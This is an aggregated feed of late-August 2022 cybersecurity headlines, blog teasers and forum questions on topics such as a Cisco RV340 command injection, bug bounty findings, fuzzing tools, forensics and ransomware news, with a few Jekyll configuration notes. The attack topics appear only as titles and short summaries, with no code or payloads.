    Author: Rivaille (Knownsec 404 Lab). Date: 29 August 2022. Root cause: this is a command injection vulnerability in the Cisco RV340 and RV160 series; the injection occurs in wfapp, as follows. When wfapp runs it checks whether a webfilter database file exists in /tmp/webrootdb; if it does, it does not send a database update request to the server, and if it does not, it pulls an update. At the same time wfap...
  • Open

    ‮Phishin!
    How threat actors and ethical hackers are utilising the right-to-left override character to masquerade phishing payloads. Continue reading on Medium »
  • Open

    Looking for Slack / Discord servers to help exchange experience
    I enjoy discussions on cybersecurity, and I'm wondering if you know of any discord servers or slack channels for that... Thanks in advance!! submitted by /u/karimhabush [link] [comments]
    Personal data collection sites
    Hi! I know this is more of a r/privacy question but mods removed it and suggested I post it on here :( Besides this sub, I really have no idea where else to go. So the thing is that about 2 years ago I stumbled across some company's site that said it collected data about people be it on Fb/Ig and even a bit beyond search engines. Iirc I think that its main job was to harvest data for further data science upon them for marketing purposes etc. and then sell them to bigger companies that rely on that data. Because I'm an EU citizen, I was eligible for getting a copy of all the data they have on me. The site required ID document verification but I didn't do it at that time. I've really been dying to find this site for the past few months but without success. I'd really like that personal data now to see what's gathered beyond some search engine results. Does anyone know about this one? Thanks! submitted by /u/friderik [link] [comments]
    What is server_name in nginx?
    In nginx configuration file, can we define the server_name on our own? Or there is some specific value to the server_name? #cybersecurity #infosec submitted by /u/mkkedia3 [link] [comments]
  • Open

    Huge collection of Academic Textbooks in Portuguese
    submitted by /u/afmachado [link] [comments]
    Huge collection of books, fantasy, self-help, classics, sci-fi, books in Magyar and etc
    https://zfelleg.useribm.hu/unsorted/ebooks/source/ submitted by /u/AnnoyingRomanian [link] [comments]
    Korean? and Hollywood movies (in Korean probably)
    http://dogjdw.ipdisk.co.kr/public/VOL1/public/movie/ submitted by /u/RainyAbrar [link] [comments]
    (first post) Free robux? robux indeed, we robux robux ah yes robux robux? robux hax robux?
    Actually though has some cheat files, seems like this person scans the internet for files and presses them into directories for whatever, random images, couple good wallpapers actually. Marked as nsfw since it's massive. https://www.js100.com/uploads/ckeditor/files/ submitted by /u/BitterSweetcandyshop [link] [comments]
    buriedbits Mac software
    submitted by /u/the_real_nirv [link] [comments]
  • Open

    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    Clickjacking Vulnerability
    What is clickjacking Continue reading on Medium »
    Unsubscribe any user’s e-mail notifications via IDOR
    IDOR allows attacker to unsubscribe any user from the Websites email service. Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks
    Server-side request forgery (SSRF) attacks exploit software vulnerabilities that could allow an attacker to trick the server-side… Continue reading on Medium »
    Redline Stealer
    The Redline Stealer Continue reading on Medium »
    Nuclei for Bug Bounties Hunters
    Nuclei is used to send requests across targets based on a template, providing fast scanning on a large number of hosts. Continue reading on Medium »
    OWASP: The Open Web Application Security Project
    The Open Web Application Security Project (OWASP) is a non-profit foundation dedicated to improving software security. Continue reading on Medium »
    DoS and DDoS attacks
    Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks are malicious attempts to disrupt the normal operations of a… Continue reading on Medium »
  • Open

    SecWiki News 2022-08-28 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Break me out of sandbox in old pipe: CVE-2022-22715 Windows Dirty Pipe
    Article URL: https://whereisk0shl.top/post/break-me-out-of-sandbox-in-old-pipe-cve-2022-22715-windows-dirty-pipe Comments URL: https://news.ycombinator.com/item?id=32628094 Points: 2 # Comments: 1
  • Open

    Dr. Chaos – A structured fuzzing framework in Nim
    Article URL: https://github.com/status-im/nim-drchaos Comments URL: https://news.ycombinator.com/item?id=32627934 Points: 58 # Comments: 7
  • Open

    Anti-Digital Forensics resources
    Hi everyone, do you know any resources about the latest and state-of-the-art anti-digital forensics techniques and/or tools? submitted by /u/zr0_day [link] [comments]
    IOS forensics. Evidence of phone unlocked to phone locked again?
    No experience with IOS forensics. Work has me in Windows and Linux but a personal matter came up and I need to see if someone was using my SO's iPhone for an extended period of time. Screen time shows they were in Messages but I'm looking for hard evidence that the phone was unlocked from x time to x time or evidence of messages accessed (guessing that's a no). Is this doable with iPhone forensics and can someone point me towards a resource on how to go about obtaining that data? submitted by /u/P1zza0fD3ath [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 34
    Summary of the espionage-related news stories for the Week 34 (August 21–27) of 2022. Continue reading on Medium »
  • Open

    Jekyll Cheatsheet
    Introduction Jekyll is, alongside Hugo and Hexo, a very widely used SSG (Static Site Generator). It is written in Ruby, lets you control templates with Liquid syntax, and lets you easily build all sorts of features by adding Gems (RubyGems) that contain them. Directory Structure _config.yml: the Jekyll site's config file. Variables, options and other settings used by Jekyll are contained in this file. _posts: the default post directory. In most themes, date-sorted data such as blog posts goes here. _pages: the default page directory. Gemfile: the Ruby Gemfile. Jekyll plugins can also be installed by declaring them in the Gem file. Note that, apart from directories excluded via exclude in config.yml, directories prefixed with _ are not included in the site, while directories without the prefix have their contents included. So if you create a directory named _data and do not separately include it in the site (output: true), it will not go into the site. This lets you keep and manage data used only during the build separately. Usage Basic jekyll new: creates a site. jekyll new-theme: creates a theme. jekyll serve, server, s: runs the Jekyll site locally. jekyll build: builds the site (static files are generated under the _site path). jekyll doctor, hyde: checks whether there are warnings. The ones above are the most commonly used; the other subcommands can be listed with jekyll -h. Advanced - Jekyll Compose Installing Jekyll Compose adds features for writing and managing posts from the Jekyll command. Pages created with these commands have part of their front matter filled in automatically. The front matter can also be configured to whatever format the user wants. bundle exec jekyll...
  • Open

    On Cryptocurrency Wallet Design – defines access control taxonomy, can be reused e.g. for MFA factors
    submitted by /u/D4r1 [link] [comments]
    SATisfying our way into remote code execution in the OPC UA industrial stack
    submitted by /u/SRMish3 [link] [comments]
  • Open

    TCP Socket Listen: A Tale of Two Queues
    TL; DR This post digs into the design and implementation of the TCP listen queues in Linux kernel. Hope that after reading through this post, readers will have a deeper understanding about the underlying working mechanism of TCP/socket listening and 3-way handshaking, as well as related kernel configurations and performance tunings. Fig. The "SYN queue" and accept queue of a listening state TCP socket TL; DR 1 Introduction 1.1 Why listen queues? 1.2 Technical requirements for (server-side) 3WHS implementation [1] 1.3 Where are the queues in Linux kernel code? 1.4 Purpose of this post 2 Fundamentals: socket related data structures 2.1 Classification of socket related structs 2.2 Connection request related structs 2.2.1 struct request_sock:a (proto agnostic) connection reque…

  • Open

    Where does BitLocker store its main encryption key?
    Does BitLocker store its encryption key in memory? submitted by /u/pozazero [link] [comments]
    Audio file being used as evidence has section removed.
    I have an ongoing case where approximately 6 seconds of audio is removed. I tried to look at metadata myself. Assuming I’m looking at the right thing it appears suspicious.. but perhaps that’s just basic coding? Can anyone tell me what I would be looking for or willing to help look at it.. is there a way to bring back what was removed from the audio .wav file? submitted by /u/DigConsistent8437 [link] [comments]
  • Open

    Namecheap vulnerability they refuse to fix: no 2FA on support portal login
    Article URL: https://crimew.gay/notice/AMxFUTYtsMNtzbDzQu Comments URL: https://news.ycombinator.com/item?id=32623356 Points: 7 # Comments: 3
  • Open

    Phishing: Don't take that bait!
    In this article I will walk with you in an attempt to answer the following questions: What is it? Why is it still so common? What are the… Continue reading on Medium »
    Active methods for identifying Telegram users in OSINT
    Active OSINT-methods to identify the user of the Telegram messenger, owners and administrators of communities implies a legendary access… Continue reading on Medium »
    A Beginner’s Guide to Investigating Vessels and Sanctions Using Maltego
    If you are new to Maltego, you can check out my other blog here for getting started with the installation of the free Maltego Community… Continue reading on Medium »
  • Open

    SSRF — The Server’s Loophole 01
    No content preview
    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    No content preview
    ‍$7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and…
    No content preview
    SSRF leads to access AWS metadata.
    No content preview
    $7000 Bounty, Web3 Bug Hunting, API Hacking, IDOR, Triggering XSS with emojis, XSS Flyer, and much…
    No content preview
  • Open

    Server Side Template Injections Portswiggers Labs Walkthrough Part III
    Hi, My name is Hashar Mujahid, Today we are going to solve some more SSTI labs from Portswiggers. If you want to learn what Server Side… Continue reading on InfoSec Write-ups »
    Cross site request forgery (CSRF) attack
    What is CSRF Continue reading on Medium »
    Brute Force Attack
    What’s a Brute Force Attack? Continue reading on Medium »
    My Hall of Fame at United Nations Success Story
    Hey , Continue reading on Medium »
    SSRF — The Server’s Loophole 01
    Successful Cyberattacks often start at the “Network Perimeter”. Continue reading on InfoSec Write-ups »
    SSRF leads to access AWS metadata.
    Hi Mates, I am Akash Patil (@skypatil98) from India. I am in the bug bounty field from the last 2.5 years. My previous blog is all about… Continue reading on InfoSec Write-ups »
    Capture The bug: For Businesses and Security Researchers
    For Businesses Continue reading on Medium »
    Improper Input Validation Leads To Email Spamming
    Hi Guys, In this article, I will share how did I found Improper Input Validation Leads To Email Spamming on my target (redacted.com) Continue reading on Medium »
    The Million Dollar Hack
    Hacking a leading gift card company with a simple IDOR + Race condition Continue reading on Medium »
    Hack the LAMPSecurity: CTF8 (CTF Challenge)
    Welcome to Hack the LAMPSecurity: CTF8 (CTF Challenge).  download it from https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ Continue reading on Medium »
  • Open

    802.11 Elicit Client / Known MAC Response via Broadcast Frame
    I'm basically a complete novice in the realm of 802.11. I'm specifically interested in if there is a mechanism where I can broadcast a specific management (or other) frame that would elicit a response from a specific MAC address (client, not access point). This would be from the point of view of a random emitter in the area - not as an access point the client is connected to or a client connected to the same access point as a target client. Preferably this would be non-intrusive (e.g. not something like a deauth attack) The actual contents of this response do not matter, I am primarily interested in triggering the emission itself. submitted by /u/gitchery [link] [comments]
    Vulnerability Scanner and PAT/NAT
    We are deploying a vulnerability scanner in a SoC, that is connected to multiple networks over MPLS. Some of the sites have Dynamic NAT. It is my understanding that with this setup Port Scanning will be unreliable, may even cause outage to legitimate traffic due to starvation. If at all we are going to NAT, it should be 1 to 1 NAT. Let me know if I am wrong in these. submitted by /u/anatoxin123 [link] [comments]
  • Open

    SecWiki News 2022-08-27 Review
    Research on Chrome Sandbox Bypass by 路人甲; Defensive Countermeasure Ideas Against C2 Hidden Behind Cloud Functions by 路人甲. For more of the latest articles, visit SecWiki
  • Open

    Java Memory Shells and JSP: Things That Must Be Said
    This is also fundamentals for memory shells. I strongly object to jumping straight into memory shells from the start; before studying memory shells you should at least understand what an ordinary webshell is, and not be a script kiddie.
    Java Memory Shell Fundamentals: Learning the Tomcat Architecture
    I wrote an article analysing the fundamentals behind memory shells; fellow practitioners who need it are welcome to study it.
    Notes on a Penetration Test with Lateral Movement Across Docker Virtual Machines
    This penetration test involved repeated lateral movement among several Docker virtual machines, finally finding an exit that allowed a Docker escape and taking over the server; the process was tortuous but full of fun.
    Information-Stealing Malware Spreads Through Fake Pirated-Software Download Sites
    It has been more than twenty years since Napster released pirated content on the Internet, and nearly ten years since The Pirate Bay torrent site appeared.
    HackTheBox-Responder
    A beginner target machine, mainly for learning the basic use of some penetration-testing tools/plugins (Wappalyzer, Responder, john).
  • Open

    Command Injection in the GitHub Pages Build Pipeline
    submitted by /u/whisperingmime [link] [comments]
    Microsoft: New UEFI CA memory mitigation requirements for signing
    submitted by /u/sanitybit [link] [comments]
    The Elastic Container Project for Security Research
    submitted by /u/sanitybit [link] [comments]
  • Open

    Param Digger! Easy param mining via ZAP
    This year's ZAP GSoC project selected an add-on that does param mining. Since the goal was to mine easily, modelled on Burp Suite's Param Miner, this was very welcome news for me, who had been doing param mining only with scripting and fuzzing. Somehow the snowball grew..😆 It was finally officially released recently, so I'm writing it up on the blog too :D Param Digger Start Mining You can start mining from many places such as History and Request via right-click (Context Menu) > Attack > Param Digger. Options By default, guessing is possible for URL, Header and Cookie; several methods are supported, and for the wordlist you can use either the predefined ones or a custom wordlist. It operates similarly to Param Miner (Burp Suite): it requests many parameters at once, looks at the differences in the response, and gradually infers which parameters have an effect. This is certainly more efficient than throwing them in randomly. Result If a hidden parameter is found, you can see it in the output tab. Hot Key Shortcut-key support for Param Digger and its tab exists. API Not supported yet, but given that a Hello World has been made for the local API, it seems likely to be added later. Name confusion The name Param Digger has a bit of history. In GSoC, and in the first release, it was released under the name Param Miner, but Albinowax raised the issue of the name collision, so it was eventually renamed Param Digger. Conclusion Of course, for the time being I'll keep using fuzzing, scripting and Param Digger together, but I think Param Digger's share will gradually grow. And in the future various mining techniques such as FAT GET will be added to Param Digger...
    Working with Jekyll Collections
    Recently, after moving back to Jekyll, I've been developing a few features. Solving one of them required a step that gathers pages of a specific type and turns them into JSON, and I solved it easily using Jekyll's Collection feature. Today I'd like to talk about Jekyll Collections. Jekyll Collection A Jekyll Collection is a feature that lets you group and manage content. The official site uses the case of multiple authors as its example, but depending on how you use it, you can make a Jekyll site much richer. Collections are a great way to group related content like members of a team or talks at a conference. Jekyll Personally, I understood it as being able to create more things like the pages and posts that Jekyll provides by default. And if you actually create one, you'll see that it is almost identical to pages or posts. In _config.yml To create a collection, you must declare it under the collections entry in _config.yml. When declared as below, the ./_newcollections/ subpath is recognised as the collection. collections: newcollections: # collection name output: true # when output is set, it becomes an accessible page. sort_by: name # sort_by specifies the sort order. order: - first.md - second.md # order lets you specify the ordering manually. In Liquid Now the pages under _newcollections have become a collection named newcollections and can be referenced anywhere in the Jekyll site as site.newcollections. I generated the json file in the form below. [ {% for post in site.newcollections %}...
  • Open

    When Windows Lies
    "When Windows Lies"...what does that really mean?  Mari had a fascinating blog post on this topic some years ago; she talked about the process DFIR analysts had been using to that point to determine the installation date of the operating system. In short...and this has happened several more times since then...while DFIR analysts had been using one process to assess the installation date, Windows developers had changed how this information is stored and tracked in Windows systems, reaffirming the notion that operating systems are NOT designed and maintained with forensic examiners in mind. ;-) The take-away from Mari's blog article...for me, anyway...is the need for analysts to keep up-to-date with changes to the operating system; storage locations, log formats, etc., can (and do) change wi…
  • Open

    A Very Unorganized (and German?) Dir. Marked as NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]

  • Open

    Matano - An open source serverless security lake platform for AWS using Rust + Apache Iceberg
    submitted by /u/sanitybit [link] [comments]
    Tool Release – JWT-Reauth - a plugin aims to provide a painless solution to this issue. JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope.
    submitted by /u/digicat [link] [comments]
    Zimbra Open Bucket Data Leak – Responsible Disclosure
    submitted by /u/bowline90 [link] [comments]
    Undetectable backdooring PE file
    submitted by /u/InformationSecurity [link] [comments]
    Security in Advanced Analytics and Machine Learning Environments
    submitted by /u/Preatoria [link] [comments]
  • Open

    Encase Remote Collection of CrowdStrike Contained host over VPN
    Hello everyone, We are facing some issues connecting to a CrowdStrike contained host which was on VPN before containment from Encase Safe. So, the scenario tested: On Prem Host: Encase to host (non-contained) works fine; Encase to host (contained) works fine. VPN Host (On Citrix): Encase to host (non-contained) works fine; Encase to host (CONTAINED) --not working.. We did some packet capture, seems Encase agent sending RST to Safe server. We also did whitelist Encase safe servers, Citrix gateways in Crowdstrike so communication is through, but it didn't solve our issue. Problem seems that once we contain via CrowdStrike it kicks the host off VPN? that maybe making host unreachable from internal EnCase? Has anybody faced a similar issue? or any workaround or possible troubleshooting suggestions? This is giving us nightmares as we cannot do any remote collection and can't afford taking any infected host off contained state. Thanks in advance! submitted by /u/ANTBW1 [link] [comments]
    Remote Collection of Gmail
    Braintrust, What are some current methods and suggestions for forensically sound acquisition of the contents of a Gmail account (I have consent from the client)? I have a test Gmail account that I requested a dump of the email via Google Takeout which I understand is provided in mbox format (still waiting on data). I am aware that some tools have the ability to ingest Google Takeout data (e.g., Recon_Lab). Any thoughts on the above? Any success with Axiom or PA Cloud? Anything else? Thanks. submitted by /u/Sir_Agent_Apple [link] [comments]
  • Open

    Centipede – a distributed fuzzing engine. Work-in-progress
    Article URL: https://github.com/google/centipede Comments URL: https://news.ycombinator.com/item?id=32612084 Points: 2 # Comments: 0
    Show HN: Jazzer.js – Fuzzing for JavaScript is now effective
    Article URL: https://github.com/CodeIntelligenceTesting/jazzer.js Comments URL: https://news.ycombinator.com/item?id=32606206 Points: 8 # Comments: 1
  • Open

    Privilege Escalation - "Analyst" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]
    LinkedIn disclosed a bug submitted by naaash: https://hackerone.com/reports/1572591 - Bounty: $500
  • Open

    SheHacksKE KCA Intervarsity CTF — 2022 Write up
    A short write up for some ctf challenges held at KCA University during the intervarsity bootcamp by SheHacksKE. Challenge link… Continue reading on Medium »
    How to check if the Russian law was violated?
    Let’s consider ways of OSINT-solution of a standard task of any security service — obtaining data on criminal and administrative… Continue reading on Medium »
  • Open

    Threat Hunting Tools: Our Recommendations
    submitted by /u/Successful_Mix_8988 [link] [comments]
    Eavesdropping: Does it cost €8,000,000 to buy Predator spyware?
    submitted by /u/anusec [link] [comments]
  • Open

    MetaMask Security Monthly: August 2022
    Security Lab Continue reading on Medium »
    Space Bug Bounty program
    Welcome to ENEX.SPACE Bug Bounty program Continue reading on ENEX.SPACE »
    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    Hello everyone. Today I’m going to talk about five different vulnerabilities that I found on a single page. Three of these vulnerabilities… Continue reading on InfoSec Write-ups »
    Why another Bug Bounty platform when we have HackerOne?
    HackerOne is a great platform, but it’s US-based and doesn’t understand/cater to New Zealand businesses’ needs. Continue reading on Medium »
    XSS-VDP-HACKERONE
    In this tutorial you will learn, how I just found xss vulnerability in the register page of VDP website in hackerone and how I bypassed… Continue reading on Medium »
  • Open

    SecWiki News 2022-08-26 Review
    A Few Things Between Me and Intrusion Detection by ourren; Summary and Analysis of 2022 Half-Year Anti-Money-Laundering Penalty Information by ourren; A Casual Discussion of Ruby Security by ourren; How to Conduct Blue Army (Adversary Simulation) Work and Quantitative Assessment by ourren; Anonymous: "Red Team Attack Security Configuration" by ourren. For more of the latest articles, visit SecWiki
  • Open

    Critical command injection vulnerability discovered in Bitbucket Server and Data
    Article URL: https://portswigger.net/daily-swig/critical-command-injection-vulnerability-discovered-in-bitbucket-server-and-data-center Comments URL: https://news.ycombinator.com/item?id=32608967 Points: 2 # Comments: 0
  • Open

    OTE: Temporary E-mail via Terminal
    ote is a tool developed in Python that generates temporary e-mail addresses and automatically extracts OTPs or confirmation links… Continue reading on 100security »
    Introduction to PsExec and its Detections
    What is PsExec? Continue reading on Medium »
  • Open

    Key Points of Data Compliance in Laos Explained
    According to the World Bank, compared with other comparable regional economies, Laos lags significantly behind in the accessibility, quality and affordability of Internet services.
    FreeBuf Morning Report | DDoS attacks surged 203% in the first half of the year; MIIT names 47 apps and SDKs that infringe user rights
    The MIIT's list of problematic apps (SDKs) shows that applications including 神州专车, 网鱼, 虎扑, 零跑, 宝沃汽车 and 奔腾 YOMI are on it.
    The hackers who attacked cloud communications giant Twilio went on to attack more than 130 organisations within a few months
    After successively attacking cloud communications giant Twilio and cloud service provider Cloudflare in early August, the attackers are gradually surfacing.
    斗象科技 2022 New Product Launch: "Vulnerability Intelligence Product" Unveiled
    2022-8-27 10:00:00|2022-8-27 23:59:59
    FreeBuf Weekly | Apple's serious security vulnerability tops the trending searches; LockBit gang hit by DDoS attack
    In this week's FreeBuf Weekly, we summarise and recommend the week's hot news, security incidents, good articles of the week and handy tools, making sure you don't miss any of this week's highlights!
    Hackers are using AiTM attacks to monitor corporate executives' Microsoft 365 accounts
    This is a typical business email compromise attack, whose goal is most likely to divert large financial transactions to bank accounts controlled by the attackers.
    LockBit gang hit by DDoS attack, suspectedly for leaking victim data
    The DDoS attack appears to be retaliation for its exposure of data stolen from security company Entrust.
    A Simple and Effective Supply-Chain Attack: Dependency Confusion
    Dependency Confusion is a simple yet highly effective supply-chain attack technique that affected several large technology companies and earned well over US$100,000 in bug bounties.
  • Open

    Project Recommendation: XPEViewer
    Author: horsicq Project name: XPEViewer Project URL: https://github.com/horsicq/XPEViewer A PE file viewer/editor for Windows, Linux and MacOS. 1. Download: https://github.com/horsicq/XPEViewer/releases 2. How to run: https://github.com/horsicq/XPE...
  • Open

    Sometimes times the best hack is no hack at all — $2900 Shopify Bug Bounty
    Access control is key. Continue reading on InfoSec Write-ups »
    Bypassing unexpected IDOR
    No content preview
    Stored XSS using SVG file
    No content preview
    Break the Logic: 5 Different Perspectives in Single Page (€1500)
    No content preview
  • Open

    Credentials Stealing via XSS (Cookie Stealing)
    Cookie stealing allows to grab password which are saved in the browser password manager of the victim. Continue reading on Medium »
    XSS-VDP-HACKERONE
    In this tutorial you will learn, how I just found xss vulnerability in the register page of VDP website in hackerone and how I bypassed… Continue reading on Medium »
  • Open

    HTB Assessment
    Is anyone up to collab a private HTB Assessment? It has 6 machines and only 2 days. Let me know! Thanks in advance! submitted by /u/Puzzleheaded-Try5749 [link] [comments]
    Why is TeamViewer offering different versions of their installer for download depending on your geographic location?
    This is the second time this has happened. I notice because we use a third-party tool to deploy app updates and it (rightfully) refuses to deploy one when the hash is different than expected. Here are the VirusTotal links for the 64-bit download. US version: VirusTotal - File - 56bedaf015c0e610c26607fe47162445354870f66c3080f7fa55000f825798eb International version: VirusTotal - File - 3427c194abd6ff53f609df56bd2064b2903491f90184c5edd819f3d220842540 submitted by /u/QworpVoop [link] [comments]

  • Open

    Did I get hacked
    So I did something stupid. I clicked on an ad for an app on TikTok (which is stupid I know) and it took me to what looked like the App Store for iOS and after I clicked install it prompted me to enter my password… And I think after I entered my password I just sort of closed the app and forgot about it. Just a bit ago I thought oh… I should check out that app, only to see that it was not installed and there was no record of me downloading the app in the App Store. I changed my iOS password as well as my bank password to be safe, but I have not noticed any sort of unusual activity on anything. Almost everything that has two factor authentication is turned on. Edit - my wife thinks maybe it was actually a legit ad and perhaps after I entered my password I needed to hit install again and I neglected to do that so the app never actually installed. submitted by /u/histtohrev [link] [comments]
    Template for responding to phishing email inquiries
    A user wants confirmation if a link is safe to visit. What does your response email look like? What key points do you make in every response? Example: Hi Bob, This email is Malicious. This is a phishing attempt and not legitimate Microsoft Support. Please delete the email from your inbox. If you clicked on this link or interacted with this email in any way, please let us know. Thanks, Alice submitted by /u/Jaruki_Jurakami [link] [comments]
    How does your company do Incident Reports?
    Do you write the reports as they happen? Past-tense vs present-tense writing? Every action down to the minute or a high-level overview only? submitted by /u/Jaruki_Jurakami [link] [comments]
    Vulnerability Scanning Checklist?
    What are some things to consider when planning and executing vulnerability scans in an enterprise environment? Examples: What time to run scans? How often? Authenticated vs Not-authenticated? Agent vs Agentless? etc Links to good resources also welcome. submitted by /u/Jaruki_Jurakami [link] [comments]
    What are some good YouTube channels, TV shows or articles to use to expand cybersecurity knowledge?
    Hi I am always looking to expand my cybersecurity skills and knowledge whether it be doing new certs or even just attending conferences. Now I want to take it one step further and start getting more exposure to cybersecurity stuff like the latest scams. For example, I recently watched a video why it is bad idea to take photos of your keys and how it can be printed using a 3D printer. What are some good YouTube channels, TV shows or articles to use to expand cybersecurity knowledge? submitted by /u/securm0n [link] [comments]
    SANS SEC575 Alternative?
    Can anybody recommend an alternative to SANS SEC575 (Mobile Device Security and Ethical Hacking)? Unfortunately the cost of SANS training now exceeds my company's annual reimbursement threshold. I'm primarily interested in in-person or live virtual offerings. Thanks! ETA: I'm not concerned about whether or not there is a certification associated with a course. I just want the training. submitted by /u/koei19 [link] [comments]
    Do I Need IDS?
    Hi. I asked a question a few days ago about how to monitor network traffic on my Mac and PC and got the suggestion to try Security Onion. I spent the whole of 5 seconds researching it and closed the browser when I saw that it worked on Linux only. My uneducated self had no clue. I was so bummed by the suggestion I threw a hissy fit and deleted the thread. Since then, I've been continuing my cybersecurity research and somehow ended up giving Security Onion a lengthier look. Thankfully I can still see the one particular response that was actually exactly what I was looking for, i.e. that Security Onion works with monitoring traffic and logs for Mac, Linux and Windows, which are the three environments that I use for my work. Anyway, I spent the last few days researching Security Onion and that got me wondering. It's a lot of effort and not free. I don't have a cybersecurity background so understanding the logs/alerts will be a struggle. I'll also need to purchase a server and watch the paid training that SO offer on their site. But I gather the SO videos aren't all that I'll need to succeed with this whole thing. Having said that, I like a challenge, I like learning something new and I don't mind spending the time, money and energy on this whole thing, if it's necessary - I do have stuff to do to make my product which is not related to this whole cybersecurity thing. But I was mainly wondering, yay, or nay? Do I need to go down the rabbit hole for my business? How imperative is an IDS? I'm already setting up firewalls, but I'm fully aware of the blind spot that results from not including IDS into the mix. But can a one man shop realistically review all the logs and alerts and the sheer volume of data that will be generated by my network? Or should I do it to the best of my abilities because it's better than nothing? submitted by /u/Jastibute [link] [comments]
  • Open

    Practical Review: Penetrating an MS SQL Database in an Intranet Environment
    Having the web server, the MS SQL server and PC clients on the same network is a dangerous network structure; compromising the MS SQL server is very easy.
    Main Attack Methods Against RSA
    RSA is an asymmetric encryption algorithm developed by Rivest, Shamir and Adleman, in which a public key and a private key are used together.
    [Vulnerability Reproduction] Shiro Deserialization (CVE-2016-4437)
    Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management.
    Reject Vanity Projects: Improving the Practical Value of Security Visualization | FreeBuf Enterprise Group Topic Discussion
    The industry has placed high hopes on security visualization in recent years, but does it really live up to expectations in practice, and how can it avoid becoming a vanity project that is all show and no substance?
    FreeBuf Morning News | Buyer pays a fortune for a supercar but cannot collect it because of a hack; Russian malware subverts AD FS authentication
    A man paid 22 million on an auction platform for a Koenigsegg Regera supercar; when he went to collect the car, the platform told him that a hacker attack had corrupted the auction result.
    From WPS to Baidu Netdisk: Are We Really "Living Under Surveillance"?
    Two incidents have once again stirred up netizens' deep-seated worries about personal privacy and security; where is the boundary between content security and privacy protection?
    Google Discovers New Iranian Hacker Tool That Can Steal Gmail, Yahoo, Outlook and Other Email Accounts
    Charming Kitten has added a new tool to its malware arsenal that can retrieve user data from Gmail, Yahoo and Microsoft Outlook accounts.
    Dominican Republic Government Agency Hit by Ransomware Attack
    The Dominican Republic's Instituto Agrario Dominicano was hit by a rampant Quantum ransomware attack.
    Malware Spreading Through Pirated Copies of 3DMark and Other Software
    These malicious pirated-software sites also rank very highly in Google search results.
    How to Use MrKaplan to Hide and Clean Up Traces of Code Execution During Red Team Operations
    MrKaplan helps red team researchers clean up and hide traces of code execution during an engagement.
  • Open

    Cold technique metasploit local permissions exploitation suggestion
    #lownsec777 Continue reading on Medium »
    Let’s talk about my beginnings in security research
    Hello bug bounty community, I started hunting 9 months ago, after passing my OSCP certification in November 2021. (Link to my… Continue reading on Medium »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Top Golang Bug Bounty tools and repositories on Github
    Continue reading on Medium »
    This SIMPLE trick will exploit image uploads - $2500 TikTok bug bounty.
    Stored XSS in SVG files. Continue reading on InfoSec Write-ups »
    Easy & Step-By-Step Ways of Finding Bugs in Software
    The bug is one of the most horrifying words for many developers. Even many experienced and highly skilled developers encounter bugs as it… Continue reading on Medium »
  • Open

    Asking for advice on sharing Axiom portable cases with detectives
    Hello, I work as a CSI for a smaller department and as such I am in charge of most if not all digital evidence in our investigations unit. We currently utilize a GrayKey to extract phones and Axiom to process the images. The problem I am having is it takes a couple days for me to extract, process, create portable case, extract to usb and share with detectives. Our department can't afford to set up for Magnet Review which was my first option. I was just wondering if anyone has advice for setting up something myself or if someone is in a similar situation. Thank you submitted by /u/nub_cho [link] [comments]
    Incident Response : Analysing an old "ransomwared" VM
    Hello everyone, I recently got interested in Forensics and got the chance to play with Autopsy and Volatility in several CTFs, but I don't know exactly how can we get these logs from a Windows Server. I have an infected VM that I want to turn on to get the logs and do an investigation on that server to test my capabilities in a real world situation : How to do turn on the VM in a secure way, without impacting the network again ? What if it was a real physical server. How to collect logs of a Windows Server What are the steps to take after my network got owned Any online ressources and advices are welcomed :) Thank you for your time. submitted by /u/aes256bits [link] [comments]
    Windows Base File and Hash Search
    Hi, I need to find some DLL file hashes from different operating systems like Windows 7, Windows 8, Windows 10, etc. I can't remember the GitHub project name or website indexes all Windows base files, and there was a search function, too. So how can I access file hashes after the operating system is installed, and nothing has changed? May you propose any project which gives an online search function that has search functions like hash search, file name search, etc.? Regards. submitted by /u/kaptangenzosan [link] [comments]
    Digital Forensic Analysis Career
    As I am very tech savvy I am looking into a career in the digital forensic field , particularly at a bank or even law enforcement. I am 20 and have my GED. I hear I need to get my bachelors degree. Do I just go to college for a degree in computer forensics? Also looking to be a information security analyst submitted by /u/ALPHAMATE9 [link] [comments]
  • Open

    LastPass Recent Security Incident
    submitted by /u/zwamkat [link] [comments]
    Guide to Using Secrets Management in Enterprise
    submitted by /u/mesok8 [link] [comments]
    Free SANS Workshop: Building an Azure Pentest Lab for Red Teams
    submitted by /u/sanitybit [link] [comments]
    IAM Whoever I Say IAM :: Infiltrating VMWare Workspace ONE Access Using a 0-Click Exploit
    submitted by /u/albinowax [link] [comments]
    Ransomware Actor Abuses Genshin Impact Anti-Cheat Driver to Kill Antivirus
    submitted by /u/CyberMasterV [link] [comments]
    MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone - Microsoft Security Blog
    submitted by /u/gid0rah [link] [comments]
    2-byte DoS in freebsd-telnetd / netbsd-telnetd / netkit-telnetd / inetutils-telnetd / telnetd in Kerberos Version 5 Applications - Binary Golf Grand Prix 3
    submitted by /u/PierreKimSec [link] [comments]
    Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)
    submitted by /u/sanitybit [link] [comments]
    Uncovering a ChromeOS remote memory corruption vulnerability
    submitted by /u/sanitybit [link] [comments]
    whids - Open Source EDR for Windows
    submitted by /u/sanitybit [link] [comments]
  • Open

    Threat Assessment: Black Basta Ransomware
